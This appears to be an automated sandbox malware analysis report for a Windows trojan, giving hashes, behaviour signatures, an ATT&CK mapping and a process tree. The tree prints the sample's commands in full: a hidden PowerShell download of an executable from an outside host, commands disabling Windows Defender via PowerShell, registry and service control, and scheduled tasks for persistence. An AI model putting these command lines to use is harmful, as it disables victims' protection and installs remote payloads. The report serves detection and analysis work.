Overview

overview

10

Static

static

3

db9756031d...95.exe

windows7-x64

10

db9756031d...95.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    135s
  • max time network
    136s
  • platform
    windows7_x64
  • resource
    win7-20240729-en
  • resource tags

    arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
  • submitted
    24-12-2024 05:52

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95.exe

  • Size

    126KB

  • MD5

    7176b040816932541eb9c2b91d90b29b

  • SHA1

    137a9c4620366caff2a1d1c297b6ae8c6d28761d

  • SHA256

    db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95

  • SHA512

    1332645e8c6b53994b4f3f28b980c1fe646cec1771e77982a85ec4036725f4f2930bd9a45caea8a03b8a8ece0b432955b0d55e09396f5a80fd7c0d2825b0d1de

  • SSDEEP

    3072:a2sMWkzbJh1qZ9QW69hd1MMdxPe9N9uA0hu9TBfcX011:7bJhs7QW69hd1MMdxPe9N9uA0hu9TBZn

Score
10/10
evasionexecutiontrojan

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe

Signatures

  • Disables service(s) 3 TTPs
    evasionexecution
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 8 IoCs
    evasiontrojan
  • Blocklisted process makes network request 8 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

    Run Powershell and hide display window.

    execution
  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 1 IoCs
  • Drops file in System32 directory 6 IoCs
  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Runs net.exe
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 8 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence
  • Views/modifies file attributes 1 TTPs 4 IoCs
    evasion

Processes

  • C:\Users\Admin\AppData\Local\Temp\db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95.exe
    "C:\Users\Admin\AppData\Local\Temp\db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2116
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\37A.tmp\37B.tmp\37C.bat C:\Users\Admin\AppData\Local\Temp\db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2880
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2596
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\Admin\AppData\Local\Temp\reddit.exe')"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3060
      • C:\Windows\system32\attrib.exe
        attrib -h "C:\Users\Admin\AppData\Roaming\HiddenScripts\db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95.exe"
        3⤵
        • Views/modifies file attributes
        PID:2796
      • C:\Windows\system32\schtasks.exe
        schtasks /query /TN "RunRedditLogon"
        3⤵
          PID:2828
        • C:\Windows\system32\schtasks.exe
          schtasks /create /tn "RunRedditLogon" /tr "C:\Users\Admin\AppData\Roaming\HiddenScripts\db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95.exe" /sc onlogon /rl highest /f
          3⤵
          • Scheduled Task/Job: Scheduled Task
          PID:2704
        • C:\Windows\system32\schtasks.exe
          schtasks /query /TN "RunRedditMinute"
          3⤵
            PID:1976
          • C:\Windows\system32\schtasks.exe
            schtasks /create /tn "RunRedditMinute" /tr "C:\Users\Admin\AppData\Roaming\HiddenScripts\db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95.exe" /sc minute /mo 1 /rl highest /f
            3⤵
            • Scheduled Task/Job: Scheduled Task
            PID:2652
          • C:\Windows\system32\sc.exe
            sc config WinDefend start= disabled
            3⤵
            • Launches sc.exe
            PID:2676
          • C:\Windows\system32\net.exe
            net stop WinDefend
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:2708
            • C:\Windows\system32\net1.exe
              C:\Windows\system32\net1 stop WinDefend
              4⤵
                PID:2736
            • C:\Windows\system32\reg.exe
              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
              3⤵
                PID:2780
              • C:\Windows\system32\reg.exe
                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
                3⤵
                • Modifies Windows Defender Real-time Protection settings
                PID:1084
          • C:\Windows\system32\taskeng.exe
            taskeng.exe {654DB60A-64BE-4E37-807F-DDC47E1092ED} S-1-5-21-2703099537-420551529-3771253338-1000:XECUDNCD\Admin:Interactive:[1]
            1⤵
            • Loads dropped DLL
            • Suspicious use of WriteProcessMemory
            PID:2720
            • C:\Users\Admin\AppData\Roaming\HiddenScripts\db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95.exe
              C:\Users\Admin\AppData\Roaming\HiddenScripts\db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95.exe
              2⤵
              • Executes dropped EXE
              • Suspicious use of WriteProcessMemory
              PID:1044
              • C:\Windows\system32\cmd.exe
                "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\2E03.tmp\2E04.tmp\2E05.bat C:\Users\Admin\AppData\Roaming\HiddenScripts\db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95.exe"
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:2332
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
                  4⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Drops file in System32 directory
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1640
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\Admin\AppData\Local\Temp\reddit.exe')"
                  4⤵
                  • Blocklisted process makes network request
                  • Command and Scripting Interpreter: PowerShell
                  • Drops file in System32 directory
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2512
                • C:\Windows\system32\attrib.exe
                  attrib -h "C:\Users\Admin\AppData\Roaming\HiddenScripts\db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95.exe"
                  4⤵
                  • Views/modifies file attributes
                  PID:1916
                • C:\Windows\system32\schtasks.exe
                  schtasks /query /TN "RunRedditLogon"
                  4⤵
                    PID:1528
                  • C:\Windows\system32\schtasks.exe
                    schtasks /query /TN "RunRedditMinute"
                    4⤵
                      PID:840
                    • C:\Windows\system32\sc.exe
                      sc config WinDefend start= disabled
                      4⤵
                      • Launches sc.exe
                      PID:1080
                    • C:\Windows\system32\net.exe
                      net stop WinDefend
                      4⤵
                        PID:1436
                        • C:\Windows\system32\net1.exe
                          C:\Windows\system32\net1 stop WinDefend
                          5⤵
                            PID:2640
                        • C:\Windows\system32\reg.exe
                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
                          4⤵
                            PID:2060
                          • C:\Windows\system32\reg.exe
                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
                            4⤵
                            • Modifies Windows Defender Real-time Protection settings
                            PID:2524
                      • C:\Users\Admin\AppData\Roaming\HiddenScripts\db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95.exe
                        C:\Users\Admin\AppData\Roaming\HiddenScripts\db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95.exe
                        2⤵
                        • Executes dropped EXE
                        PID:2256
                        • C:\Windows\system32\cmd.exe
                          "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\17D4.tmp\17D5.tmp\17D6.bat C:\Users\Admin\AppData\Roaming\HiddenScripts\db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95.exe"
                          3⤵
                            PID:2180
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
                              4⤵
                              • Command and Scripting Interpreter: PowerShell
                              • Drops file in System32 directory
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:316
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              powershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\Admin\AppData\Local\Temp\reddit.exe')"
                              4⤵
                              • Blocklisted process makes network request
                              • Command and Scripting Interpreter: PowerShell
                              • Drops file in System32 directory
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2168
                            • C:\Windows\system32\attrib.exe
                              attrib -h "C:\Users\Admin\AppData\Roaming\HiddenScripts\db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95.exe"
                              4⤵
                              • Views/modifies file attributes
                              PID:1328
                            • C:\Windows\system32\schtasks.exe
                              schtasks /query /TN "RunRedditLogon"
                              4⤵
                                PID:1652
                              • C:\Windows\system32\schtasks.exe
                                schtasks /query /TN "RunRedditMinute"
                                4⤵
                                  PID:1008
                                • C:\Windows\system32\sc.exe
                                  sc config WinDefend start= disabled
                                  4⤵
                                  • Launches sc.exe
                                  PID:648
                                • C:\Windows\system32\net.exe
                                  net stop WinDefend
                                  4⤵
                                    PID:2600
                                    • C:\Windows\system32\net1.exe
                                      C:\Windows\system32\net1 stop WinDefend
                                      5⤵
                                        PID:836
                                    • C:\Windows\system32\reg.exe
                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
                                      4⤵
                                        PID:2020
                                      • C:\Windows\system32\reg.exe
                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
                                        4⤵
                                        • Modifies Windows Defender Real-time Protection settings
                                        PID:1224
                                  • C:\Users\Admin\AppData\Roaming\HiddenScripts\db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95.exe
                                    C:\Users\Admin\AppData\Roaming\HiddenScripts\db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95.exe
                                    2⤵
                                    • Executes dropped EXE
                                    PID:2788
                                    • C:\Windows\system32\cmd.exe
                                      "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\232.tmp\233.tmp\234.bat C:\Users\Admin\AppData\Roaming\HiddenScripts\db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95.exe"
                                      3⤵
                                        PID:2336
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
                                          4⤵
                                          • Command and Scripting Interpreter: PowerShell
                                          • Drops file in System32 directory
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:2864
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          powershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\Admin\AppData\Local\Temp\reddit.exe')"
                                          4⤵
                                          • Blocklisted process makes network request
                                          • Command and Scripting Interpreter: PowerShell
                                          • Drops file in System32 directory
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:2692
                                        • C:\Windows\system32\attrib.exe
                                          attrib -h "C:\Users\Admin\AppData\Roaming\HiddenScripts\db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95.exe"
                                          4⤵
                                          • Views/modifies file attributes
                                          PID:2668
                                        • C:\Windows\system32\schtasks.exe
                                          schtasks /query /TN "RunRedditLogon"
                                          4⤵
                                            PID:2652
                                          • C:\Windows\system32\schtasks.exe
                                            schtasks /query /TN "RunRedditMinute"
                                            4⤵
                                              PID:2676
                                            • C:\Windows\system32\sc.exe
                                              sc config WinDefend start= disabled
                                              4⤵
                                              • Launches sc.exe
                                              PID:2724
                                            • C:\Windows\system32\net.exe
                                              net stop WinDefend
                                              4⤵
                                                PID:2780
                                                • C:\Windows\system32\net1.exe
                                                  C:\Windows\system32\net1 stop WinDefend
                                                  5⤵
                                                    PID:1084
                                                • C:\Windows\system32\reg.exe
                                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
                                                  4⤵
                                                    PID:3016
                                                  • C:\Windows\system32\reg.exe
                                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
                                                    4⤵
                                                    • Modifies Windows Defender Real-time Protection settings
                                                    PID:2384

                                            Network

                                            MITRE ATT&CK Enterprise v15

                                            Reconnaissance

                                            Resource Development

                                            Initial Access

                                            Execution

                                            Command and Scripting Interpreter

                                            1
                                            T1059

                                            PowerShell

                                            1
                                            T1059.001

                                            Scheduled Task/Job

                                            1
                                            T1053

                                            Scheduled Task

                                            1
                                            T1053.005

                                            System Services

                                            1
                                            T1569

                                            Service Execution

                                            1
                                            T1569.002

                                            Persistence

                                            Create or Modify System Process

                                            2
                                            T1543

                                            Windows Service

                                            2
                                            T1543.003

                                            Scheduled Task/Job

                                            1
                                            T1053

                                            Scheduled Task

                                            1
                                            T1053.005

                                            Privilege Escalation

                                            Create or Modify System Process

                                            2
                                            T1543

                                            Windows Service

                                            2
                                            T1543.003

                                            Scheduled Task/Job

                                            1
                                            T1053

                                            Scheduled Task

                                            1
                                            T1053.005

                                            Defense Evasion

                                            Hide Artifacts

                                            1
                                            T1564

                                            Hidden Files and Directories

                                            1
                                            T1564.001

                                            Impair Defenses

                                            1
                                            T1562

                                            Disable or Modify Tools

                                            1
                                            T1562.001

                                            Modify Registry

                                            1
                                            T1112

                                            Credential Access

                                            Discovery

                                            Query Registry

                                            1
                                            T1012

                                            System Information Discovery

                                            1
                                            T1082

                                            Lateral Movement

                                            Collection

                                            Command and Control

                                            Exfiltration

                                            Impact

                                            Service Stop

                                            1
                                            T1489

                                            Replay Monitor

                                            Loading Replay Monitor...

                                            Downloads

                                            • C:\Users\Admin\AppData\Local\Temp\37A.tmp\37B.tmp\37C.bat
                                              Filesize

                                              2KB

                                              MD5

                                              c0e9bc2dfff6e08df8196809b9bbf253

                                              SHA1

                                              006e88ea359145c40a6bbca55e6f21b387999255

                                              SHA256

                                              43c1dfafac6c340f420057606f317c2d0d3182c04f1a9c76b782f818c85f4f11

                                              SHA512

                                              5b0c012aca5479bf3b8852e1504465ccb2ad6ce4134ee8d2ad57c898fd91ac19f96a669ebc3a9201e65099ed1723f4515b48ca25ea21681ad45377ce3d9ca60c

                                              Download Submit

                                            • C:\Users\Admin\AppData\Roaming\HiddenScripts\db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95.exe
                                              Filesize

                                              126KB

                                              MD5

                                              7176b040816932541eb9c2b91d90b29b

                                              SHA1

                                              137a9c4620366caff2a1d1c297b6ae8c6d28761d

                                              SHA256

                                              db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95

                                              SHA512

                                              1332645e8c6b53994b4f3f28b980c1fe646cec1771e77982a85ec4036725f4f2930bd9a45caea8a03b8a8ece0b432955b0d55e09396f5a80fd7c0d2825b0d1de

                                              Download Submit

                                            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\OAWB67LHDJBAR1XIZ8ZA.temp
                                              Filesize

                                              7KB

                                              MD5

                                              eeee14ba7f4805b9d1c43062fecd924b

                                              SHA1

                                              c4aa8f1ea903bf36464dfddfa5a1509e7d3037d7

                                              SHA256

                                              50ca8d636e9a6558bad945d555c8a538b98cacff82f0d87f980ad68d3ce6180f

                                              SHA512

                                              4d21a27de46896d4380e51820086f75f8abc4fd616d70c0f8ea730aaea50c5e303c4d9bfdfc8b72924a13350625c7db665027ac092b1cde58c1a2a70e764420a

                                              Download Submit

                                            • memory/2596-7-0x000000001B6A0000-0x000000001B982000-memory.dmp

                                              Filesize

                                              2.9MB

                                              Download

                                            • memory/2596-10-0x000007FEF5B40000-0x000007FEF64DD000-memory.dmp

                                              Filesize

                                              9.6MB

                                              Download

                                            • memory/2596-11-0x000007FEF5B40000-0x000007FEF64DD000-memory.dmp

                                              Filesize

                                              9.6MB

                                              Download

                                            • memory/2596-12-0x000007FEF5B40000-0x000007FEF64DD000-memory.dmp

                                              Filesize

                                              9.6MB

                                              Download

                                            • memory/2596-13-0x000007FEF5B40000-0x000007FEF64DD000-memory.dmp

                                              Filesize

                                              9.6MB

                                              Download

                                            • memory/2596-9-0x000007FEF5B40000-0x000007FEF64DD000-memory.dmp

                                              Filesize

                                              9.6MB

                                              Download

                                            • memory/2596-8-0x0000000002710000-0x0000000002718000-memory.dmp

                                              Filesize

                                              32KB

                                              Download

                                            • memory/2596-6-0x000007FEF5DFE000-0x000007FEF5DFF000-memory.dmp

                                              Filesize

                                              4KB

                                              Download

                                            • memory/3060-20-0x0000000002250000-0x0000000002258000-memory.dmp

                                              Filesize

                                              32KB

                                              Download

                                            • memory/3060-19-0x000000001B620000-0x000000001B902000-memory.dmp

                                              Filesize

                                              2.9MB

                                              Download